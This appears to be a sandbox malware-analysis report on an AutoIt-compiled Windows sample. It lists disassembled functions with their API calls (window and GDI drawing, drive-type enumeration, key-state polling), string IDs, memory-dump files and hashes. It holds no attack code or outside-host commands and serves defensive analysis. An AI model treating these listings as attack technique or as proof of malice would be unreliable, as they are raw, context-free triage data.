                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                              • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                              • API String ID: 2910397461-517079104
                                                                              • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                              • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                              • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                              • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                              Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                              • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                              • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                              • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                              • Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                              • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                              Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: a64d156c1a3759cf61978354314c033782f0c1e370379f846eba91cde2a0968d
                                                                              • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                              • Opcode Fuzzy Hash: a64d156c1a3759cf61978354314c033782f0c1e370379f846eba91cde2a0968d
                                                                              • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                              Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 0048A903
                                                                              • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                              • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                              • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                              • GetSysColor.USER32(00000011), ref: 0048A945
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                              • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                              • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                              • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                              • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                              • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                              • DeleteObject.GDI32(?), ref: 0048AA89
                                                                              • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                              • DeleteObject.GDI32(?), ref: 0048AA94
                                                                              • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                              • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: 34246ba9337d173cc8f9a45cfedbb85d18430b0a0e81cf6a5f0a68edb3952d83
                                                                              • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                              • Opcode Fuzzy Hash: 34246ba9337d173cc8f9a45cfedbb85d18430b0a0e81cf6a5f0a68edb3952d83
                                                                              • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                              Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                              • CharNextW.USER32(0000014E), ref: 00488B01
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                              • _memset.LIBCMT ref: 00488C44
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                              • _memset.LIBCMT ref: 00488CEC
                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                              • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: 298b2f1f1664179a54222b4601512dc3fc1f4c1d78b96e35a59af930373c321e
                                                                              • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                                              • Opcode Fuzzy Hash: 298b2f1f1664179a54222b4601512dc3fc1f4c1d78b96e35a59af930373c321e
                                                                              • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                                              Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 004849CA
                                                                              • GetDesktopWindow.USER32 ref: 004849DF
                                                                              • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                              • DestroyWindow.USER32(?), ref: 00484A74
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                              • IsWindowVisible.USER32(?), ref: 00484B29
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                              • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                              • CopyRect.USER32(?,?), ref: 00484BC7
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                              • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                                              • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                              • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                                              Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                                              • _wcscpy.LIBCMT ref: 00464500
                                                                              • _wcscmp.LIBCMT ref: 0046450B
                                                                              • _wcscat.LIBCMT ref: 00464521
                                                                              • _wcsstr.LIBCMT ref: 0046452C
                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                                              • _wcscat.LIBCMT ref: 00464591
                                                                              • _wcscat.LIBCMT ref: 00464598
                                                                              • _wcsncpy.LIBCMT ref: 004645C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 699586101-1459072770
                                                                              • Opcode ID: d8701eec414c1c2d5183025d5b0024e031a0248585d9ae2cba5f14a58eae9aa5
                                                                              • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                                              • Opcode Fuzzy Hash: d8701eec414c1c2d5183025d5b0024e031a0248585d9ae2cba5f14a58eae9aa5
                                                                              • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                                              Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                              • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                              • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                              • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                              • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                              • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 8230eef7603afee7a67e90df488af8036995465dfdd4a77bdf6363274e995632
                                                                              • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                              • Opcode Fuzzy Hash: 8230eef7603afee7a67e90df488af8036995465dfdd4a77bdf6363274e995632
                                                                              • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                              Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                              • __swprintf.LIBCMT ref: 0045A51B
                                                                              • _wcscmp.LIBCMT ref: 0045A52E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                              • _wcscmp.LIBCMT ref: 0045A5BF
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                              • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                              • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                              • GetParent.USER32(?), ref: 0045A69C
                                                                              • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                              • _wcscmp.LIBCMT ref: 0045A731
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                              • _wcscmp.LIBCMT ref: 0045A76B
                                                                                • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                              • String ID: %s%u
                                                                              • API String ID: 3744389584-679674701
                                                                              • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                              • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                              • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                              • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                              Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                              • _wcscmp.LIBCMT ref: 0045AF29
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                              • _wcscmp.LIBCMT ref: 0045AF8C
                                                                              • _wcsstr.LIBCMT ref: 0045AF9D
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                              • _wcscmp.LIBCMT ref: 0045AFE5
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                              • _wcscmp.LIBCMT ref: 0045B065
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                              • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                              • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                                              • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                                              • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                                              Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                                                • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
